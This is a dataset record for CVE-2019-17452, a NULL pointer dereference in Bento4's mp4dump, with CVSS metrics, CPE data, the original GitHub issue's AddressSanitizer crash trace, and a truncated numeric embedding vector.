cve_id
stringclasses
822 values
cve_published
timestamp[ns]
cve_descriptions
stringclasses
818 values
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringclasses
844 values
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
8.04k
issue_title
stringlengths
1
346
issue_comments_url
stringlengths
59
81
issue_comments_count
int64
0
146
issue_created_at
timestamp[ns]
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
40
62
issue_github_id
int64
128M
2.4B
issue_number
int64
21
125k
label
bool
2 classes
issue_msg
stringlengths
120
8.18k
issue_msg_n_tokens
int64
120
8.18k
issue_embedding
sequencelengths
3.07k
3.07k
CVE-2019-17452
2019-10-10T17:15:17.780000
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListInspector::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::InspectFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4dump.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/434" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/434
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 File Dumper - Version 1.2 (Bento4 Version 1.5.1.0) **Command** mp4dump --verbosity 2 POC-file **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==12343==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000054cbf4 bp 0x7fff4ca92010 sp 0x7fff4ca91f30 T0) #0 0x54cbf3 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 #1 0x69aa85 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x69aa85 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327 #3 0x586b12 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:9 #4 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x57843c in AP4_AtomListInspector::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.h:532:9 #6 0x673506 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #7 0x673506 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #8 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x5283ae in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:9 #10 0x7efe540e182f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x451258 in _start (/home/fuzzer/victim/Bento4/mp4dump+0x451258) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==12343==ABORTING ```
SEGV in mp4dump
https://api.github.com/repos/axiomatic-systems/Bento4/issues/434/comments
4
2019-09-29T17:37:28
2022-02-28T03:29:23Z
https://github.com/axiomatic-systems/Bento4/issues/434
499,946,487
434
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEGV in mp4dump Issue date: --- start body --- **System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 File Dumper - Version 1.2 (Bento4 Version 1.5.1.0) **Command** mp4dump --verbosity 2 POC-file **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==12343==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000054cbf4 bp 0x7fff4ca92010 sp 0x7fff4ca91f30 T0) #0 0x54cbf3 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 #1 0x69aa85 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x69aa85 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327 #3 0x586b12 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:9 #4 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x57843c in AP4_AtomListInspector::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.h:532:9 #6 0x673506 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #7 0x673506 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220 #8 0x53e7a4 in AP4_Atom::Inspect(AP4_AtomInspector&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x5283ae in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:9 #10 0x7efe540e182f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x451258 in _start (/home/fuzzer/victim/Bento4/mp4dump+0x451258) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:124:9 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==12343==ABORTING ``` --- end body ---
2,314
[ -0.023939132690429688, 0.032139040529727936, -0.003963527735322714, -0.0029726456850767136, 0.025777289643883705, 0.0027698022313416004, -0.04695918783545494, 0.05120992660522461, -0.004954409785568714, 0.03032960370182991, -0.03386231139302254, -0.003687086049467325, 0.014461131766438484, 0.007876792922616005, 0.009758032858371735, 0.00007225180888781324, -0.031277403235435486, 0.005808865651488304, -0.032454971224069595, -0.014619098044931889, 0.036935482174158096, -0.03268474340438843, -0.009320034645497799, 0.04523591324687004, -0.034695226699113846, 0.002391041023656726, -0.03498243913054466, 0.01533712912350893, -0.0008190033840946853, 0.03030088171362877, -0.02121061645448208, 0.025245947763323784, -0.015394571237266064, 0.0018704690737649798, 0.044977422803640366, 0.026093224063515663, 0.04351263865828514, 0.031076354905962944, 0.0022851317189633846, 0.0329432338476181, 0.0013472044374793768, -0.05092271417379379, -0.03920445963740349, 0.02006176859140396, -0.00732749979943037, 0.017850235104560852, 0.031593337655067444, 0.007474696263670921, -0.04489126056432724, 0.007424434181302786, 0.007919874973595142, -0.0010240908013656735, -0.040669240057468414, -0.05821790173649788, 0.02073671668767929, -0.029726456850767136, 0.00676025589928031, 0.016342371702194214, -0.011976746842265129, 0.025446996092796326, -0.022503072395920753, -0.011581829749047756, 0.003496807999908924, 0.017677906900644302, 0.02431250922381878, 0.013936969451606274, -0.003028293140232563, -0.0025795241817831993, -0.027198990806937218, 0.023077495396137238, -0.015394571237266064, -0.033287886530160904, 0.00321318581700325, 0.0250161774456501, -0.004871835932135582, -0.01595463417470455, 0.04405834525823593, 0.017591744661331177, -0.03972144052386284, 0.014295984990894794, -0.038256656378507614, 0.023364707827568054, -0.0500323548913002, 0.03167949989438057, 0.0329432338476181, -0.015236604027450085, -0.0390034094452858, -0.06864370405673981, -0.0051051960326731205, -0.049084555357694626, 0.00479285279288888, 0.014777065254747868, 0.041214942932128906, 0.022345105186104774, 0.016902435570955276, 0.018869837746024132, -0.02635171450674534, -0.01953042671084404, -0.05448414385318756, -0.026868697255849838, -0.03647594153881073, -0.026682008057832718, 0.007445974741131067, 0.0032813989091664553, -0.0070295175537467, 0.013901067897677422, 0.01294608786702156, -0.020980847999453545, 0.029726456850767136, 0.12442030012607574, 0.012213696725666523, -0.0017681497847661376, -0.021325502544641495, -0.02003304660320282, 0.016170043498277664, 0.015380210243165493, 0.0021953778341412544, -0.038285378366708755, -0.04509230703115463, -0.032598577439785004, -0.016012078151106834, -0.020607471466064453, -0.02090904489159584, 0.027098465710878372, -0.022574875503778458, 0.06083153188228607, -0.0025741388089954853, -0.010691472329199314, -0.005561145022511482, -0.007596761453896761, -0.029381802305579185, -0.021454747766256332, -0.0074100736528635025, -0.0147483441978693, -0.02892226353287697, -0.0038450525607913733, -0.02451355755329132, 0.042220186442136765, 0.02434122934937477, 0.0032113909255713224, -0.06536948680877686, -0.026854336261749268, 0.02964029461145401, 0.01901344396173954, -0.01420982088893652, -0.007431614212691784, 0.005837586708366871, 0.013405626639723778, -0.0019261164125055075, 0.004911327734589577, -0.012357302941381931, -0.002243845025077462, 0.017534302547574043, 0.006214553024619818, 0.03989376872777939, 0.019429901614785194, 0.007733187172561884, 0.012113172560930252, -0.0065268962644040585, -0.03311556205153465, -0.0003924484772142023, -0.00932721421122551, 0.022517431527376175, -0.04379985108971596, -0.014698081649839878, -0.012579891830682755, 0.021655796095728874, 0.0001327234203927219, 0.018123086541891098, 0.01609824039041996, -0.00806348118931055, -0.008077841252088547, 0.023723723366856575, 0.017764071002602577, -0.0483090840280056, -0.01542329229414463, 0.015710504725575447, 0.04379985108971596, -0.03205287456512451, 0.004168166313320398, -0.006932583171874285, 0.00986573752015829, 0.001022295793518424, -0.008523020893335342, 0.019271934404969215, -0.008824593387544155, 0.05100887641310692, -0.04802187159657478, 0.04423066973686218, 0.002299492247402668, 0.000493197119794786, 0.002181017305701971, -0.006749485619366169, -0.02056439034640789, 0.04351263865828514, -0.008537380956113338, -0.03848642855882645, -0.021181896328926086, -0.026868697255849838, 0.01951606571674347, 0.0019979195203632116, -0.006695633288472891, -0.009621607139706612, 0.01362103596329689, -0.007043878082185984, -0.005238031502813101, -0.022474350407719612, 0.056638237088918686, 0.01744813844561577, -0.023005692288279533, -0.006986435502767563, -0.01764918677508831, 0.02481512911617756, 0.03032960370182991, -0.007216205354779959, 0.003884544363245368, -0.012149074114859104, 0.02108137123286724, -0.012220877222716808, -0.0059596518985927105, 0.0294966883957386, -0.008314792066812515, 0.008724069222807884, -0.014705262146890163, -0.04747616872191429, -0.004089183174073696, 0.020492587238550186, 0.010389899834990501, -0.016873713582754135, -0.012192155234515667, 0.029195114970207214, 0.010748914442956448, -0.011330518871545792, -0.005252392031252384, 0.018108725547790527, 0.0207079965621233, 0.012651694938540459, -0.01766354776918888, 0.019085247069597244, 0.007162353023886681, 0.005862717982381582, 0.015882831066846848, -0.034838832914829254, 0.005589866545051336, 0.031449731439352036, 0.06152084097266197, -0.018898559734225273, -0.036418501287698746, -0.0006237888592295349, 0.011725435964763165, 0.015193522907793522, -0.01595463417470455, 0.0003480203449726105, -0.005676030181348324, 0.017046041786670685, -0.0038199215196073055, 0.041875530034303665, 0.012680415995419025, -0.019401181489229202, -0.016916794702410698, 0.015710504725575447, 0.0006902067107148468, -0.018123086541891098, -0.01463345903903246, 0.011682353913784027, -0.02243126928806305, -0.0076901051215827465, 0.0021110093221068382, -0.011510026641190052, -0.0021612714044749737, 0.01157464925199747, -0.0008495196816511452, -0.04756233096122742, -0.026969220489263535, -0.03032960370182991, -0.003310119966045022, 0.031047632917761803, 0.01250808872282505, 0.012745039537549019, -0.008436856791377068, -0.009478000923991203, 0.0046851481311023235, -0.01309687364846468, 0.008673806674778461, 0.019300656393170357, -0.004789262544363737, 0.014647819101810455, -0.01714656502008438, -0.03730885684490204, -0.0002771148574538529, 0.032627299427986145, 0.02550443820655346, -0.03544197976589203, 0.01344152819365263, -0.010432980954647064, 0.022876447066664696, -0.016299288719892502, 0.01028937567025423, -0.005665259435772896, 0.010411440394818783, -0.012005467899143696, 0.0026638926938176155, 0.013118415139615536, 0.007040287833660841, -0.013398447073996067, 0.018295414745807648, -0.03460906445980072, 0.010677111335098743, -0.0007391225080937147, 0.00011437999637564644, 0.036562107503414154, -0.04253612086176872, -0.005963242147117853, -0.002656712429597974, -0.03222520276904106, -0.026983581483364105, -0.008343513123691082, -0.036418501287698746, -0.013743101619184017, 0.009011280722916126, -0.035901520401239395, -0.007697285618633032, -0.050434451550245285, 0.014181099832057953, 0.017577383667230606, -0.020966487005352974, -0.01578230783343315, 0.035729192197322845, -0.0907590389251709, 0.03989376872777939, 0.006257634609937668, -0.017261449247598648, 0.012630154378712177, -0.008415316231548786, 0.016529059037566185, -0.03084658458828926, -0.0021774270571768284, -0.0013175857020542026, 0.020765438675880432, 0.008874855004251003, -0.003963527735322714, 0.037107810378074646, -0.007252106908708811, -0.015136079862713814, -0.026940500363707542, 0.0036529796198010445, 0.01181877963244915, -0.0034214146435260773, 0.004437427502125502, 0.01061966922134161, 0.0008890113676898181, 0.014360607601702213, 0.0035901519004255533, 0.0042220186442136765, 0.004107133951038122, -0.035355813801288605, -0.03050193004310131, -0.028850460425019264, 0.021138813346624374, -0.03153589367866516, -0.004817983601242304, -0.017160926014184952, -0.02280464395880699, 0.0036565696354955435, -0.0056688496842980385, 0.003570405999198556, -0.005284703336656094, -0.01063403021544218, -0.01899908296763897, -0.01766354776918888, 0.014159559272229671, 0.04799314960837364, -0.02605014108121395, 0.02758672647178173, -0.014698081649839878, -0.016227485612034798, 0.007984497584402561, 0.026107585057616234, -0.016730107367038727, 0.002181017305701971, -0.02515978366136551, 0.0035937419161200523, 0.013254840858280659, -0.05620741844177246, 0.011172552593052387, 0.01609824039041996, -0.027285154908895493, 0.06720764189958572, -0.034005917608737946, -0.011782878078520298, -0.0016721131978556514, 0.03633233532309532, -0.044948700815439224, -0.06582902371883392, 0.018395937979221344, 0.0263947956264019, -0.02021973580121994, 0.012737859040498734, 0.023407790809869766, -0.04282332956790924, 0.03067425824701786, -0.005428309552371502, 0.02656712383031845, 0.0016936541069298983, 0.0019458623137325048, 0.039807602763175964, 0.021885566413402557, -0.02722771093249321, 0.02550443820655346, 0.012378843501210213, 0.03676315397024155, -0.0029852113220840693, 0.0017627645283937454, 0.00749623728916049, 0.021842483431100845, 0.028663773089647293, -0.013226119801402092, -0.0049579995684325695, -0.03840026259422302, 0.05158330127596855, -0.016557781025767326, 0.014791425317525864, 0.01987508125603199, 0.019932523369789124, 0.016687026247382164, 0.04006609320640564, -0.01833849586546421, 0.009463639929890633, 0.020277177914977074, -0.04397217929363251, -0.005676030181348324, 0.0027626219671219587, 0.003687086049467325, 0.0058519477024674416, 0.004588214214891195, -0.02774469368159771, -0.014547294937074184, -0.04641348496079445, -0.018596986308693886, -0.0030300882644951344, -0.02896534465253353, 0.04006609320640564, -0.03440801426768303, -0.002189992694184184, 0.017189648002386093, -0.042708445340394974, -0.021282419562339783, -0.024973096325993538, 0.01088534016162157, -0.009276952594518661, -0.0034483408089727163, 0.04253612086176872, 0.01378618273884058, -0.004896967206150293, 0.015552537515759468, -0.0064156013540923595, -0.0026764580979943275, 0.010483243502676487, 0.0329432338476181, 0.01576794683933258, 0.0002649980888236314, 0.024757687002420425, 0.025762930512428284, 0.017922038212418556, 0.01001652330160141, 0.026624565944075584, -0.011194093152880669, -0.000807784148491919, -0.006246864330023527, -0.0034716769587248564, 0.0031629237346351147, -0.005460620857775211, 0.022675398737192154, -0.0005286498344503343, -0.009255411103367805, 0.02057875134050846, -0.01938682049512863, -0.011790058575570583, -0.01163927186280489, -0.04833780601620674, 0.005424719303846359, -0.011028946377336979, -0.019630949944257736, 0.02037770114839077, -0.011064847931265831, -0.009815474972128868, -0.003952756989747286, -0.0029870064463466406, -0.017361974343657494, -0.004936459008604288, 0.005539604462683201, 0.001758276834152639, -0.03805560991168022, -0.012903005816042423, 0.009880097582936287, -0.004283051006495953, -0.02517414465546608, -0.0074172536842525005, 0.019271934404969215, 0.04647092521190643, 0.019401181489229202, -0.048366524279117584, 0.02537519298493862, 0.00001317557689617388, 0.028879182413220406, -0.045293357223272324, -0.043598804622888565, 0.017749710008502007, -0.03064553625881672, -0.029726456850767136, -0.01899908296763897, -0.039348065853118896, 0.006885911338031292, -0.02910895086824894, -0.026179388165473938, -0.01783587411046028, 0.0107848159968853, 0.0033657674212008715, 0.012615793384611607, 0.024255065247416496, -0.017218368127942085, -0.012881465256214142, 0.008099382743239403, 0.0263947956264019, 0.004006609320640564, 0.022704120725393295, 0.006027864757925272, -0.003390898462384939, 0.024585360661149025, -0.012551170773804188, -0.0024484836030751467, -0.007277237717062235, 0.0024646392557770014, 0.03099019080400467, -0.01711784489452839, -0.002850580494850874, -0.01865442842245102, 0.0006955919088795781, 0.004437427502125502, -0.014906310476362705, -0.009219509549438953, 0.0483090840280056, -0.020679274573922157, -0.014173919335007668, -0.060027338564395905, 0.04213402047753334, 0.0026459419168531895, 0.032110318541526794, -0.01387952733784914, -0.0019656082149595022, 0.01818052865564823, 0.004764131736010313, -0.0009702385286800563, 0.0039742980152368546, -0.0033926935866475105, 0.023867329582571983, -0.039319343864917755, 0.03101891279220581, 0.022847726941108704, 0.01764918677508831, -0.01763482578098774, 0.0027482612058520317, -0.0010178080992773175, -0.0021163944620639086, 0.00009732677426654845, 0.024958735331892967, 0.00006406177271855995, 0.011064847931265831, -0.028132429346442223, 0.0049579995684325695, 0.003362177172675729, -0.005442670080810785, 0.022732840850949287, -0.029841342940926552, 0.0002881096734199673, 0.01662958413362503, -0.020291538909077644, -0.002599269850179553, -0.018036922439932823, -0.03182310611009598, 0.030071111395955086, -0.019559146836400032, -0.024355590343475342, 0.017405055463314056, 0.007205434609204531, -0.01497811358422041, 0.005101605784147978, -0.00211818958632648, 0.012184975668787956, 0.0016667279414832592, 0.006182241719216108, 0.009607246145606041, -0.023565756157040596, -0.01001652330160141, 0.0018004612065851688, -0.021282419562339783, 0.016859352588653564, 0.0017322482308372855, 0.0010213982313871384, 0.005403178744018078, -0.010002163238823414, 0.016859352588653564, -0.0006561002228409052, -0.029669014737010002, -0.029008427634835243, 0.03644722327589989, 0.022029172629117966, -0.004286641255021095, -0.0201910138130188, 0.04675813764333725, 0.003733757883310318, 0.022215859964489937, 0.05686800554394722, -0.004789262544363737, 0.014877589419484138, -0.0009675459004938602, 0.036734431982040405, -0.0010402464540675282, 0.010813537053763866, 0.01796511933207512, 0.0051051960326731205, -0.04919943958520889, 0.032627299427986145, -0.003539889818057418, 0.0040855929255485535, 0.024226345121860504, -0.017548661679029465, 0.0017403260571882129, 0.004379985388368368, -0.0294966883957386, -0.038974687457084656, 0.06709276139736176, 0.006462273187935352, -0.03446545824408531, -0.04032458737492561, 0.019257575273513794, 0.048222918063402176, -0.0045128208585083485, -0.00536009669303894, -0.031966712325811386, 0.026509681716561317, -0.008767151273787022, -0.029726456850767136, -0.007147992495447397, -0.034005917608737946, -0.004279461223632097, 0.013226119801402092, -0.013233299367129803, 0.023206742480397224, 0.00924105104058981, -0.04058307781815529, -0.017563022673130035, 0.001270913751795888, 0.002480794908478856, 0.02121061645448208, -0.016485977917909622, 0.034522898495197296, 0.05566171556711197, 0.00226897606626153, -0.006056586280465126, -0.016572140157222748, -0.029697736725211143, -0.003446545684710145, 0.015653062611818314, -0.0011991107603535056, -0.00196740310639143, -0.03716525062918663, -0.02943924441933632, 0.004509230609983206, 0.010813537053763866, 0.005974012892693281, -0.046356040984392166, 0.01595463417470455, 0.005543194245547056, -0.00205715699121356, -0.021110093221068382, 0.0069720749743282795, 0.007819350808858871, -0.01917141117155552, 0.0036475942470133305, 0.007654203567653894, -0.00847275834530592, -0.005701160989701748, 0.015523816458880901, -0.01799384132027626, 0.0055503747425973415, 0.0009083084296435118, -0.0003047141362912953, -0.018640069290995598, -0.034149523824453354, 0.017002958804368973, -0.016701387241482735, 0.02777341566979885, 0.02874993532896042, 0.021512189880013466, -0.06318667531013489, 0.023221101611852646, -0.00011836281919386238, -0.020593110471963882, -0.016170043498277664, -0.003884544363245368, -0.004182526841759682, 0.008594824001193047, -0.01465499959886074, 0.03463778644800186, 0.01830977387726307, -0.015710504725575447, -0.005945291370153427, 0.03391975536942482, -0.015179161913692951, -0.03696420416235924, 0.01611260138452053, -0.026179388165473938, 0.03136356547474861, 0.0020248456858098507, -0.00967186875641346, 0.00011241663014516234, -0.012285499833524227, -0.004315362311899662, -0.00043126699165441096, -0.009937540628015995, -0.008874855004251003, -0.028721215203404427, -0.013994411565363407, 0.007532138377428055, -0.0030623995698988438, 0.005212900694459677, -0.006867960561066866, 0.0161269623786211, 0.008278890512883663, -0.0019835589919239283, -0.019444262608885765, 0.0005829508882015944, 0.01079917699098587, -0.03696420416235924, 0.003963527735322714, -0.009556984528899193, -0.028003184124827385, 0.012170614674687386, 0.013628216460347176, 0.004031740594655275, -0.004717459436506033, -0.0003933460102416575, -0.03771095350384712, -0.019918162375688553, -0.012903005816042423, 0.013226119801402092, -0.0022887217346578836, -0.006035045254975557, 0.001736735925078392, 0.004455378279089928, 0.02638043649494648, 0.028692493215203285, -0.036246173083782196, -0.02638043649494648, -0.010267834179103374, 0.044087063521146774, 0.011373600922524929, 0.0008580462890677154, 0.00942773837596178, -0.0072808279655873775, -0.01001652330160141, -0.005722702015191317, 0.015121719799935818, 0.004645656328648329, -0.023264184594154358, 0.015696143731474876, -0.03440801426768303, 0.015107358805835247, 0.010224752128124237, 0.018640069290995598, -0.015968995168805122, -0.025777289643883705, -0.004387165419757366, 0.02704102359712124, -0.015882831066846848, -0.011323339305818081, 0.015207882970571518, 0.013980051502585411, 0.004602574743330479, -0.03524092957377434, 0.0022007629740983248, -0.03170822188258171, 0.003200620412826538, -0.002631581388413906, -0.0032078006770461798, 0.030559372156858444, -0.011431043967604637, 0.020664913579821587, -0.007862432859838009, -0.02057875134050846, -0.00536009669303894, 0.042019136250019073, -0.014920671470463276, -0.0012242418015375733, -0.021655796095728874, 0.003498602891340852, 0.010849438607692719, -0.022345105186104774, -0.020076129585504532, 0.005600636824965477, 0.01971711404621601, -0.01796511933207512, -0.02464280277490616, 0.0002387450949754566, -0.013994411565363407, 0.01830977387726307, 0.020291538909077644, -0.0407266840338707, 0.010332456789910793, 0.00016245436563622206, -0.008523020893335342, 0.024786408990621567, 0.005019032396376133, 0.018553905189037323, -0.0064156013540923595, -0.0073813521303236485, -0.015150440856814384, 0.0006596904131583869, 0.021167535334825516, 0.0059883734211325645, 0.004990310873836279, -0.029898785054683685, -0.027471842244267464, 0.029669014737010002, -0.028850460425019264, 0.017002958804368973, 0.023594478145241737, 0.004290231503546238, 0.014935031533241272, -0.006074537057429552, 0.005877078510820866, -0.005198539700359106, 0.0064156013540923595, -0.011007405817508698, 0.03871619701385498, 0.007424434181302786, -0.007069008890539408, -0.003218571189790964, 0.05910826101899147, -0.05345018208026886, 0.0035506600979715586, -0.01835285685956478, -0.009880097582936287, -0.0015904372557997704, -0.039147015661001205, -0.008286070078611374, -0.0025849093217402697, -0.0016694206278771162, 0.014367788098752499, 0.03139228746294975, 0.012737859040498734, 0.0025364423636347055, 0.021454747766256332, -0.007460335735231638, 0.0039491672068834305, 0.019645310938358307, -0.026983581483364105, 0.023594478145241737, -0.011409502476453781, 0.046183712780475616, -0.0004063603118993342, -0.04819419980049133, -0.0014549089828506112, -0.0034447507932782173, -0.00585912773385644, 0.002075107768177986, -0.03975016251206398, -0.013341004028916359, -0.00483593437820673, 0.01645725592970848, -0.018711870536208153, 0.038113053888082504, 0.017850235104560852, -0.022689759731292725, -0.011194093152880669, -0.005460620857775211, 0.009269772097468376, 0.007212615106254816, 0.021986089646816254, 0.005309834610670805, 0.020779799669981003, -0.004078412428498268, -0.0015015810495242476, 0.028979705646634102, -0.036734431982040405, 0.0294966883957386, -0.010045245289802551, -0.043081823736429214, -0.004681557882577181, -0.0027267204131931067, 0.0034752669744193554, -0.052645985037088394, -0.012831202708184719, 0.03256985917687416, 0.01250090915709734, -0.00036888811155222356, -0.02740003913640976, -0.035556863993406296, -0.03730885684490204, 0.002793138148263097, 0.011761337518692017, 0.024585360661149025, 0.0006031455122865736, -0.022330744192004204, 0.003031883155927062, 0.04098517447710037, 0.021038290113210678, -0.017002958804368973, 0.014217001385986805, 0.02498745732009411, -0.0064156013540923595, 0.007481876295059919, -0.03139228746294975, -0.02791702002286911, -0.0025938847102224827, -0.018869837746024132, -0.001673010759986937, -0.005557555239647627, 0.05706905573606491, -0.002471819519996643, -0.008530200459063053, 0.006885911338031292, 0.022862087935209274, 0.012263958342373371, -0.035384535789489746, -0.01762046478688717, 0.02396785467863083, -0.008006039075553417, 0.03874491900205612, -0.0010240908013656735, -0.012551170773804188, -0.001612875727005303, 0.014051854610443115, 0.023379068821668625, 0.007833711802959442, -0.020607471466064453, -0.0025454177521169186, -0.021871205419301987, -0.029180753976106644, -0.006627420429140329, 0.018194889649748802, 0.005981192924082279, -0.003155743470415473, 0.002405401784926653, 0.01370001956820488, -0.005765784066170454, -0.013104054145514965, -0.01866878941655159, -0.007711646147072315, -0.005162638146430254, -0.03343149274587631, -0.021282419562339783, -0.023249823600053787, -0.032110318541526794, 0.03015727549791336, -0.012386023998260498, 0.0030300882644951344, 0.002075107768177986, 0.006483814213424921, 0.04626987874507904, 0.025705486536026, -0.020593110471963882, -0.0207079965621233, 0.04193297401070595, 0.020119210705161095, -0.038658756762742996, 0.018539544194936752, -0.0075464993715286255, -0.01783587411046028, -0.0068536000326275826, -0.026839975267648697, 0.008602003566920757, 0.033977195620536804, -0.014432410709559917, 0.01747685857117176, -0.0002690370019990951, -0.0012825817102566361, -0.019587868824601173, -0.013132775202393532, -0.009032822214066982, -0.014561655931174755, 0.04434555396437645, -0.01191212423145771, 0.00539240799844265, -0.002084083156660199, 0.00917642842978239, 0.017548661679029465, 0.0021522960159927607, -0.02775905467569828, 0.012967628426849842, 0.00019555108156055212, 0.014863228425383568, -0.03549942001700401, 0.030932748690247536, 0.0006646268884651363, -0.023939132690429688, -0.02192864753305912, -0.004527181386947632, -0.017922038212418556, -0.015566898509860039, -0.010217572562396526, 0.01506427675485611, 0.005643718875944614, -0.008846133947372437, 0.00323652196675539, 0.005370866972953081, -0.010957143269479275, -0.028347838670015335, 0.004046101123094559, -0.008286070078611374, -0.0008176570991054177, 0.0074172536842525005, 0.005295474082231522, 0.008515840396285057, -0.005306244362145662, -0.0007041185162961483, 0.022158417850732803, 0.02003304660320282, 0.04371368885040283, -0.021971728652715683, 0.00467078760266304, -0.010827898047864437, -0.026423517614603043, 0.006139159668236971, 0.031449731439352036, 0.001113844569772482, -0.010404259897768497, 0.026796894147992134, 0.02514542266726494, 0.006900271866470575, 0.015006834641098976, 0.005593456793576479, 0.02653840184211731, -0.015566898509860039, -0.010935602709650993, 0.03153589367866516, -0.01232140138745308, -0.02416890300810337, 0.008034760132431984, 0.03788328170776367, 0.005263162776827812, -0.049256883561611176, 0.004965180065482855, -0.019774556159973145, 0.017433777451515198, 0.013391266576945782, 0.00942055881023407, 0.002732105553150177, -0.02123933844268322, 0.021842483431100845, 0.0058232261799275875, 0.03515476733446121, -0.0016344166360795498, 0.011280257254838943, 0.00847275834530592, -0.003615282941609621, 0.009994982741773129, 0.005758603569120169, 0.0037445283960551023, -0.012055729515850544, -0.012644514441490173, 0.004444607999175787, -0.023939132690429688, -0.007991678081452847, -0.008566102012991905, -0.001103971735574305, -0.009937540628015995, -0.0016846787184476852, 0.015796668827533722, 0.005726292263716459, -0.0021163944620639086, -0.020420784130692482, -0.016672665253281593, 0.02312057837843895, -0.0315646156668663, 